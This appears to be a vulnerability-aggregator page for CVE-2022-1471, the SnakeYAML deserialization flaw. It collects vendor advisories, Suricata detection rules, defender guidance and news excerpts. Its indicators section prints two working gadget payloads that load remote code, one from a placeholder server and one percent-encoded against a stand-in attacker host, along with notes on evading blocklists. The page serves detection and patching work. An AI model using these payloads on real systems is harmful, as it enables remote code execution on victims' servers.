CVE-2022-1471
published 2022-12-01CVE-2022-1471: SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker…
PriorityP183critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
99.61%
99.9th percentile
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | submarine | >= 0.7.0 < 0.8.0 | 0.8.0 |
| apache_software_foundation | apache_submarine | >= 0.7.0 < 0.8.0 | 0.8.0 |
| debian | snakeyaml | — | — |
| snakeyaml_project | snakeyaml | < 2.0 | 2.0 |
Detection & IOCsextracted from sources · hover to see the quote
command!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://your-server/yaml-payload.jar"]]]]↗
command!!javax.script.S%63riptEngin%65Manager [!!java.net.URLCl%61ssLoader [[!!java.net.URL ["http://attacker.example.com/"]]]]↗
- →Detect CVE-2022-1471 exploitation attempts by monitoring HTTP request bodies for SnakeYAML deserialization gadget patterns, specifically the '!!' tag prefix combined with 'javax.script.ScriptEngineManager' or 'java.net.URLClassLoader' class instantiation strings. ↗
- →Blocklist bypass via URL/percent-encoding of Java class names in YAML payloads (e.g., 'S%63riptEngin%65Manager', 'URLCl%61ssLoader') — detection rules must decode percent-encoded characters before matching against blocklists. ↗
- →Monitor for outbound HTTP requests from application servers fetching remote JAR files (e.g., 'yaml-payload.jar') shortly after receiving YAML content-type POST requests, which indicates successful SnakeYAML RCE class-loading. ↗
- →For Apache Submarine, monitor POST requests to YAML endpoints (application/yaml content-type) handled by YamlEntityProvider's readFrom method for deserialization gadget payloads. ↗
- →For TorchServe (ShellTorch), chain detection: watch for model upload requests containing YAML files with SnakeYAML gadget tags, especially when the management interface is bound to 0.0.0.0 instead of localhost. ↗
- →Identify vulnerable SnakeYAML versions (prior to 2.0) in software inventory and dependency scans; versions ≤ 1.30 are confirmed affected. ↗
- →For Atlassian products, monitor the Assets Discovery agent communication port (default 51337) for unexpected traffic as a lateral indicator of CVE-2022-1471 exploitation attempts in Jira environments. ↗
- ·The exploit payload using percent-encoded class names (e.g., 'S%63riptEngin%65Manager') bypasses simple string-based blocklists; detection rules relying on plain-text keyword matching will miss URL-encoded variants. ↗
- ·CVE-2022-1471 affects SnakeYAML by default design — arbitrary Java class instantiation from untrusted YAML is enabled out of the box, meaning any application using SnakeYAML to parse untrusted input is potentially vulnerable regardless of application-level controls. ↗
- ·For TorchServe/ShellTorch, CVE-2022-1471 is most dangerous when chained with the unauthenticated management interface misconfiguration (bound to 0.0.0.0) and CVE-2023-43654 SSRF; standalone exploitation requires the ability to upload a model. ↗
- ·Apache Submarine fix replaces SnakeYAML with jackson-dataformat-yaml; cherry-picking PR #1054 and rebuilding the submarine-server image is the workaround for versions < 0.8.0 that cannot upgrade. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ghsa9.8CRITICAL
osv9.8CRITICAL
vendor_oracle9.8HIGH
vendor_debian8.3LOW
vendor_redhat8.3HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Deserialization of Untrusted Data in apache-submarine
ghsa·2023-11-20·CVSS 9.8
CVE-2023-46302 [CRITICAL] CWE-502 Deserialization of Untrusted Data in apache-submarine
Deserialization of Untrusted Data in apache-submarine
Apache Software Foundation Apache Submarine has a bug when serializing against yaml. The bug is caused by snakeyaml https://nvd.nist.gov/vuln/detail/CVE-2022-1471 .
Apache Submarine uses JAXRS to define REST endpoints. In order to
handle YAML requests (using application/yaml content-type), it defines
a YamlEntityProvider entity provider that will process all incoming
YAML requests. In order to unmarshal the request, the readFrom method
is invoked, passing the entityStream containing the user-supplied data in `submarine-server/server-core/src/main/java/org/apache/submarine/server/utils/YamlUtils.java`.
We have now fixed this issue in the new version by replacing to `jackson-dataformat-yaml`.
This issue affects Apache Submarine: from 0
OSV
CVE-2023-46302: Apache Software Foundation Apache Submarine has a bug when serializing against yaml
osv·2023-11-20·CVSS 9.8
CVE-2023-46302 [CRITICAL] CVE-2023-46302: Apache Software Foundation Apache Submarine has a bug when serializing against yaml
Apache Software Foundation Apache Submarine has a bug when serializing against yaml. The bug is caused by snakeyaml https://nvd.nist.gov/vuln/detail/CVE-2022-1471 .
Apache Submarine uses JAXRS to define REST endpoints. In order to
handle YAML requests (using application/yaml content-type), it defines
a YamlEntityProvider entity provider that will process all incoming
YAML requests. In order to unmarshal the request, the readFrom method
is invoked, passing the entityStream containing the user-supplied data in `submarine-server/server-core/src/main/java/org/apache/submarine/server/utils/YamlUtils.java`.
We have now fixed this issue in the new version by replacing to `jackson-dataformat-yaml`.
This issue affects Apache Submarine: from 0.7.0 before 0.8.0. Users are recommended to upgrade to
OSV
Deserialization of Untrusted Data in apache-submarine
osv·2023-11-20·CVSS 9.8
CVE-2023-46302 [CRITICAL] Deserialization of Untrusted Data in apache-submarine
Deserialization of Untrusted Data in apache-submarine
Apache Software Foundation Apache Submarine has a bug when serializing against yaml. The bug is caused by snakeyaml https://nvd.nist.gov/vuln/detail/CVE-2022-1471 .
Apache Submarine uses JAXRS to define REST endpoints. In order to
handle YAML requests (using application/yaml content-type), it defines
a YamlEntityProvider entity provider that will process all incoming
YAML requests. In order to unmarshal the request, the readFrom method
is invoked, passing the entityStream containing the user-supplied data in `submarine-server/server-core/src/main/java/org/apache/submarine/server/utils/YamlUtils.java`.
We have now fixed this issue in the new version by replacing to `jackson-dataformat-yaml`.
This issue affects Apache Submarine: from 0
OSV
SnakeYaml Constructor Deserialization Remote Code Execution
osv·2022-12-12
CVE-2022-1471 [HIGH] SnakeYaml Constructor Deserialization Remote Code Execution
SnakeYaml Constructor Deserialization Remote Code Execution
### Summary
SnakeYaml's `Constructor` class, which inherits from `SafeConstructor`, allows
any type be deserialized given the following line:
new Yaml(new Constructor(TestDataClass.class)).load(yamlContent);
Types do not have to match the types of properties in the
target class. A `ConstructorException` is thrown, but only after a malicious
payload is deserialized.
### Severity
High, lack of type checks during deserialization allows remote code execution.
### Proof of Concept
Execute `bash run.sh`. The PoC uses Constructor to deserialize a payload
for RCE. RCE is demonstrated by using a payload which performs a http request to
http://127.0.0.1:8000.
Example output of successful run of proof of concept:
```
$ bash run.sh
[+
GHSA
SnakeYaml Constructor Deserialization Remote Code Execution
ghsa·2022-12-12
CVE-2022-1471 [HIGH] CWE-20 SnakeYaml Constructor Deserialization Remote Code Execution
SnakeYaml Constructor Deserialization Remote Code Execution
### Summary
SnakeYaml's `Constructor` class, which inherits from `SafeConstructor`, allows
any type be deserialized given the following line:
new Yaml(new Constructor(TestDataClass.class)).load(yamlContent);
Types do not have to match the types of properties in the
target class. A `ConstructorException` is thrown, but only after a malicious
payload is deserialized.
### Severity
High, lack of type checks during deserialization allows remote code execution.
### Proof of Concept
Execute `bash run.sh`. The PoC uses Constructor to deserialize a payload
for RCE. RCE is demonstrated by using a payload which performs a http request to
http://127.0.0.1:8000.
Example output of successful run of proof of concept:
```
$ bash run.sh
[+
OSV
CVE-2022-1471: SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization
osv·2022-12-01·CVSS 9.8
CVE-2022-1471 [CRITICAL] CVE-2022-1471: SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.
Oracle
Oracle Oracle Fusion Middleware Risk Matrix: Third Party (SnakeYAML) — CVE-2022-1471
vendor_oracle·2024-04-15·CVSS 9.8
CVE-2022-1471 [HIGH] Oracle Oracle Fusion Middleware Risk Matrix: Third Party (SnakeYAML) — CVE-2022-1471
Oracle Oracle Fusion Middleware Risk Matrix: Third Party (SnakeYAML) vulnerability
CVE: CVE-2022-1471
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuapr2024 (APR 2024)
Oracle
Oracle Oracle Communications Applications Risk Matrix: PSR Designer (SnakeYAML) — CVE-2022-1471
vendor_oracle·2024-01-15·CVSS 9.8
CVE-2022-1471 [HIGH] Oracle Oracle Communications Applications Risk Matrix: PSR Designer (SnakeYAML) — CVE-2022-1471
Oracle Oracle Communications Applications Risk Matrix: PSR Designer (SnakeYAML) vulnerability
CVE: CVE-2022-1471
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujan2024 (JAN 2024)
Oracle
Oracle Oracle Financial Services Applications Risk Matrix: Installer (SnakeYAML) — CVE-2022-1471
vendor_oracle·2023-10-15·CVSS 9.8
CVE-2022-1471 [HIGH] Oracle Oracle Financial Services Applications Risk Matrix: Installer (SnakeYAML) — CVE-2022-1471
Oracle Oracle Financial Services Applications Risk Matrix: Installer (SnakeYAML) vulnerability
CVE: CVE-2022-1471
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuoct2023 (OCT 2023)
Oracle
Oracle Oracle Communications Applications Risk Matrix: REST API (SnakeYAML) — CVE-2022-1471
vendor_oracle·2023-07-15·CVSS 9.8
CVE-2022-1471 [HIGH] Oracle Oracle Communications Applications Risk Matrix: REST API (SnakeYAML) — CVE-2022-1471
Oracle Oracle Communications Applications Risk Matrix: REST API (SnakeYAML) vulnerability
CVE: CVE-2022-1471
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujul2023 (JUL 2023)
Oracle
Oracle Oracle Communications Applications Risk Matrix: Vision (SnakeYAML) — CVE-2022-1471
vendor_oracle·2023-04-15·CVSS 9.8
CVE-2022-1471 [HIGH] Oracle Oracle Communications Applications Risk Matrix: Vision (SnakeYAML) — CVE-2022-1471
Oracle Oracle Communications Applications Risk Matrix: Vision (SnakeYAML) vulnerability
CVE: CVE-2022-1471
CVSS: 9.8
Protocol: HTTPS
Remote exploit: Yes
Affected versions: Network
Advisory: cpuapr2023 (APR 2023)
Red Hat
SnakeYaml: Constructor Deserialization Remote Code Execution
vendor_redhat·2022-10-13·CVSS 8.3
CVE-2022-1471 [HIGH] CWE-502 SnakeYaml: Constructor Deserialization Remote Code Execution
SnakeYaml: Constructor Deserialization Remote Code Execution
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.
A flaw was found in the SnakeYaml package. This flaw allows an attacker to benefit from remote code execution by sending malicious YAML content and this content being deserialized by the constructor. Deserialization is unsafe and leads to Remote Code Execution (RCE).
Statement: In the Red Hat Process Automation 7 (RHPAM) the untrusted, malicious YAML file for deserialization by the vu
Debian
CVE-2022-1471: snakeyaml - SnakeYaml's Constructor() class does not restrict types which can be instantiate...
vendor_debian·2022·CVSS 8.3
CVE-2022-1471 [HIGH] CVE-2022-1471: snakeyaml - SnakeYaml's Constructor() class does not restrict types which can be instantiate...
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.
Scope: local
bookworm: open
bullseye: open
forky: open
sid: open
trixie: open
Suricata
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 6.13.x - 6.15.x M1
suricata·2023-12-12·CVSS 8.3
CVE-2022-1471 [HIGH] ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 6.13.x - 6.15.x M1
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 6.13.x - 6.15.x M1
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 6.13.x - 6.15.x M1"; flow:established,to_client; http.header_names; to_lowercase; content:"|0d 0a|x-confluence-request-time|0d 0a|"; nocase; http.response_body; content:"|3c|meta|20|name|3d 22|ajs|2d|version|2d|number|22 20|content|3d 22|6.1"; fast_pattern; pcre:"/^[345]\./R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-application-activity;
Suricata
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.3 M1
suricata·2023-12-12·CVSS 8.3
CVE-2022-1471 [HIGH] ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.3 M1
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.3 M1
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.3 M1"; flow:established,to_client; http.header_names; to_lowercase; content:"|0d 0a|x-confluence-request-time|0d 0a|"; nocase; http.response_body; content:"|3c|meta|20|name|3d 22|ajs|2d|version|2d|number|22 20|content|3d 22|8|2e|"; fast_pattern; pcre:"/^(?:[012]\.|3\.0)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-application-activity; s
Suricata
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 7.x M1
suricata·2023-12-12·CVSS 8.3
CVE-2022-1471 [HIGH] ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 7.x M1
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 7.x M1
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 7.x M1"; flow:established,to_client; http.header_names; to_lowercase; content:"|0d 0a|x-confluence-request-time|0d 0a|"; nocase; http.response_body; content:"|3c|meta|20|name|3d 22|ajs|2d|version|2d|number|22 20|content|3d 22|7|2e|"; fast_pattern; pcre:"/^(?:1(?:3\.(?:[023456789]|1[01234567]?)|[01245678]?\.|9\.\d)|(?:[03456789]|20?)\.)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference
Suricata
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 7.x M2
suricata·2023-12-12·CVSS 8.3
CVE-2022-1471 [HIGH] ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 7.x M2
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 7.x M2
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 7.x M2"; flow:established,to_client; http.header_names; to_lowercase; content:"|0d 0a|x-confluence-request-time|0d 0a|"; nocase; http.response_body; content:"|3c|li|20|class|3d 22|print|2d|only|22 3e|Printed|20|by|20|Atlassian|20|Confluence|20|7|2e|"; fast_pattern; pcre:"/^(?:1(?:3\.(?:[023456789]|1[01234567]?)|[01245678]?\.|9\.\d)|(?:[03456789]|20?)\.)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-12961710
Suricata
ET WEB_SPECIFIC_APPS Atlassian Jira CVE-2022-1471 Vulnerable Server Detected Version 9.4 - 9.11.1 M2
suricata·2023-12-12·CVSS 8.3
CVE-2022-1471 [HIGH] ET WEB_SPECIFIC_APPS Atlassian Jira CVE-2022-1471 Vulnerable Server Detected Version 9.4 - 9.11.1 M2
ET WEB_SPECIFIC_APPS Atlassian Jira CVE-2022-1471 Vulnerable Server Detected Version 9.4 - 9.11.1 M2
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Jira CVE-2022-1471 Vulnerable Server Detected Version 9.4 - 9.11.1 M2"; flow:established,to_client; http.response_body; content:"data|2d|name|3d 22|jira|22 20|data|2d|version|3d 22|9|2e|"; fast_pattern; pcre:"/^(?:4\.(?:[023456789]|1[012]?)|1(?:1\.[01]|0\.)|[56789]\.)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-application-activity; sid:2049646; rev:1; metadata:affected_product Atlassian, attack_target Web
Suricata
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.3 M2
suricata·2023-12-12·CVSS 8.3
CVE-2022-1471 [HIGH] ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.3 M2
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.3 M2
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.3 M2"; flow:established,to_client; http.header_names; to_lowercase; content:"|0d 0a|x-confluence-request-time|0d 0a|"; nocase; http.response_body; content:"|3c|li|20|class|3d 22|print|2d|only|22 3e|Printed|20|by|20|Atlassian|20|Confluence|20|8|2e|"; fast_pattern; pcre:"/^(?:[012]\.|3\.0)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-appli
Suricata
ET WEB_SPECIFIC_APPS Atlassian Jira CVE-2022-1471 Vulnerable Server Detected Version 9.4 - 9.11.1 M1
suricata·2023-12-12·CVSS 8.3
CVE-2022-1471 [HIGH] ET WEB_SPECIFIC_APPS Atlassian Jira CVE-2022-1471 Vulnerable Server Detected Version 9.4 - 9.11.1 M1
ET WEB_SPECIFIC_APPS Atlassian Jira CVE-2022-1471 Vulnerable Server Detected Version 9.4 - 9.11.1 M1
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Jira CVE-2022-1471 Vulnerable Server Detected Version 9.4 - 9.11.1 M1"; flow:established,to_client; http.response_body; content:"|3c|meta|20|name|3d 22|ajs|2d|version|2d|number|22 20|content|3d 22|9|2e|"; fast_pattern; pcre:"/^(?:4\.(?:[023456789]|1[012]?)|1(?:1\.[01]|0\.)|[56789]\.)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-application-activity; sid:2049645; rev:1; metadata:affected_product Atlassian, a
Suricata
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 6.13.x - 6.15.x M2
suricata·2023-12-12·CVSS 8.3
CVE-2022-1471 [HIGH] ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 6.13.x - 6.15.x M2
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 6.13.x - 6.15.x M2
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2022-1471 Vulnerable Server Detected Version 6.13.x - 6.15.x M2"; flow:established,to_client; http.header_names; to_lowercase; content:"|0d 0a|x-confluence-request-time|0d 0a|"; nocase; http.response_body; content:"|3c|li|20|class|3d 22|print|2d|only|22 3e|Printed|20|by|20|Atlassian|20|Confluence|20|6.1"; fast_pattern; pcre:"/^[345]\./R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-appl
Suricata
ET WEB_SPECIFIC_APPS Atlassian Bitbucket CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.12.0
suricata·2023-12-12·CVSS 8.3
CVE-2022-1471 [HIGH] ET WEB_SPECIFIC_APPS Atlassian Bitbucket CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.12.0
ET WEB_SPECIFIC_APPS Atlassian Bitbucket CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.12.0
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Bitbucket CVE-2022-1471 Vulnerable Server Detected Version 8.0 - 8.12.0"; flow:established,to_client; http.response_body; content:"Atlassian|20|Bitbucket|20 3c|span|20|"; fast_pattern; content:"data|2d|system|2d|build|2d|number|3d 22|"; within:250; content:"|22 3e 20|v8|2e|"; within:50; pcre:"/^(?:1(?:0\.[0123]|1\.[012]|2\.0|\.)|8\.[0123456]|[0234567]\.|9\.[0123])/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:
Suricata
ET WEB_SPECIFIC_APPS Atlassian Bitbucket CVE-2022-1471 Vulnerable Server Detected Version 7.17.x - 7.21.15
suricata·2023-12-12·CVSS 8.3
CVE-2022-1471 [HIGH] ET WEB_SPECIFIC_APPS Atlassian Bitbucket CVE-2022-1471 Vulnerable Server Detected Version 7.17.x - 7.21.15
ET WEB_SPECIFIC_APPS Atlassian Bitbucket CVE-2022-1471 Vulnerable Server Detected Version 7.17.x - 7.21.15
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET WEB_SPECIFIC_APPS Atlassian Bitbucket CVE-2022-1471 Vulnerable Server Detected Version 7.17.x - 7.21.15"; flow:established,to_client; http.response_body; content:"Atlassian|20|Bitbucket|20 3c|span|20|"; fast_pattern; content:"data|2d|system|2d|build|2d|number|3d 22|"; within:250; content:"|22 3e 20|v7|2e|"; within:50; pcre:"/^(?:2(?:1\.(?:[023456789]|1[012345]?)|0\.)|1[789]\.)/R"; threshold:type limit, count 1, seconds 3600, track by_src; reference:url,confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html; reference:cve,2022-1471; classtype:web-applica
Qualys
Oracle Security Updates, April 2024: Critical Patch | Qualys
blogs_qualys·2024-04-17
Oracle Security Updates, April 2024: Critical Patch | Qualys
#### Table of Contents
- Qualys QID Coverage
- Notable Oracle Vulnerabilities Patched
- Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
- Rapid Response with Patch Management (PM)
Oracle released its second quarterly edition of Critical Patch Update, which contains patches for 441 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in various product families, including third-party components in Oracle products.
In the second quarterly Oracle Critical Patch Update, Oracle Communications received the highest number of patches, 93, constituting about 21% of the total patches released. Oracle Fusion Middleware and Oracle Financial Services Applicat
Qualys
Oracle Patch Update, April 2024 Security Update Review
blogs_qualys·2024-04-17
Oracle Patch Update, April 2024 Security Update Review
## Table of Contents
Qualys QID Coverage
Notable Oracle Vulnerabilities Patched
Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Rapid Response with Patch Management (PM)
Oracle released its second quarterly edition of Critical Patch Update, which contains patches for 441 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in various product families, including third-party components in Oracle products.
In the second quarterly Oracle Critical Patch Update, Oracle Communications received the highest number of patches, 93, constituting about 21% of the total patches released. Oracle Fusion Middleware and Oracle Financial Services Applications fo
Qualys
Oracle Patch Update, January 2024 Security Update Review
blogs_qualys·2024-01-17
Oracle Patch Update, January 2024 Security Update Review
## Table of Contents
Qualys QID Coverage
Notable Oracle Vulnerabilities Patched
Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Oracle has released its first quarterly edition of Critical Patch Update, which contains patches for 389 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in a wide range of product families, including Oracle code and third-party components included in Oracle products.
In the first quarterly Oracle Critical Patch Update, Oracle Financial Services Applications received the highest number of patches, 71, constituting 18% of the total patches released. Oracle Communications and Oracle Communications Applications follow
Qualys
Oracle Patch Update, January 2024 Security Update Review | Qualys
blogs_qualys·2024-01-17
Oracle Patch Update, January 2024 Security Update Review | Qualys
#### Table of Contents
- Qualys QID Coverage
- Notable Oracle Vulnerabilities Patched
- Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Oracle has released its first quarterly edition of Critical Patch Update, which contains patches for 389 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in a wide range of product families, including Oracle code and third-party components included in Oracle products.
In the first quarterly Oracle Critical Patch Update, Oracle Financial Services Applications received the highest number of patches, 71, constituting 18% of the total patches released. Oracle Communications and Oracle Communications Applications
Checkpoint
11th December – Threat Intelligence Report
blogs_checkpoint·2023-12-11
CVE-2023-40088 11th December – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 11th December – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 11th December, please download our Threat_Intelligence Bulletin .
TOP ATTACKS AND BREACHES
The American Greater Richmond Transit Company (GRTC), which provides services for millions of people, has been a victim of cyber-attack that impacted certain applications and parts of the GRTC network. The Play ransomware gang claimed responsibility for the attack.
Check Point Harmony Endpoint and Threat Emulation prov
Bleepingcomputer
Atlassian patches critical RCE flaws across multiple products
blogs_bleepingcomputer·2023-12-06·CVSS 8.3
[HIGH] Atlassian patches critical RCE flaws across multiple products
## Atlassian patches critical RCE flaws across multiple products
## Bill Toulas
Atlassian has published security advisories for four critical remote code execution (RCE) vulnerabilities impacting Confluence, Jira, and Bitbucket servers, along with a companion app for macOS.
All security issues addressed received a critical-severity score of at least 9.0 out of 10, based on Atlassian's internal assessment. However, the company advises companies to evaluate applicability according to their IT environment.
The company marked none of the security issues as being exploited in the wild. However, due to the popularity of Atlassian products and their extensive deployment in corporate environments, system administrators should prioritize applying the available updates.
The set of four RCE vuln
Qualys
Oracle Patch Tuesday, October 2023 Security Update Review | Qualys
blogs_qualys·2023-10-18
Oracle Patch Tuesday, October 2023 Security Update Review | Qualys
#### Table of Contents
- Qualys QID Coverage
- Notable Oracle Vulnerabilities Patched
- Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
- Rapid Response with Patch Management (PM)
Oracle has released its fourth quarterly edition of Critical Patch Update, which contains a group of patches for 387 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in Oracle code and third-party components included in Oracle products.
During the Q4 2023 Oracle Critical Patch Update, Oracle Financial Services Applications received the highest number of 103 patches, constituting 26% of the total patches released. Oracle Communications and Oracle Fusion Middleware fo
Qualys
Oracle Patch Tuesday, October 2023 Security Update Review
blogs_qualys·2023-10-18
Oracle Patch Tuesday, October 2023 Security Update Review
## Table of Contents
Qualys QID Coverage
Notable Oracle Vulnerabilities Patched
Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Rapid Response with Patch Management (PM)
Oracle has released its fourth quarterly edition of Critical Patch Update, which contains a group of patches for 387 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in Oracle code and third-party components included in Oracle products.
During the Q4 2023 Oracle Critical Patch Update, Oracle Financial Services Applications received the highest number of 103 patches, constituting 26% of the total patches released. Oracle Communications and Oracle Fusion Middleware followed,
Bleepingcomputer
ShellTorch flaws expose AI servers to code execution attacks
blogs_bleepingcomputer·2023-10-03·CVSS 8.3
[HIGH] ShellTorch flaws expose AI servers to code execution attacks
## ShellTorch flaws expose AI servers to code execution attacks
## Bill Toulas
A set of critical vulnerabilities dubbed 'ShellTorch' in the open-source TorchServe AI model-serving tool impact tens of thousands of internet-exposed servers, some of which belong to large organizations.
TorchServe, maintained by Meta and Amazon, is a popular tool for serving and scaling PyTorch (machine learning framework) models in production.
The library is primarily used by those engaged in AI model training and development, from academic researchers to big firms like Amazon, OpenAI, Tesla, Azure, Google, and Intel.
The TorchServe flaws discovered by the Oligo Security research team can lead to unauthorized server access and remote code execution (RCE) on vulnerable instances.
## The ShellTorch vulner
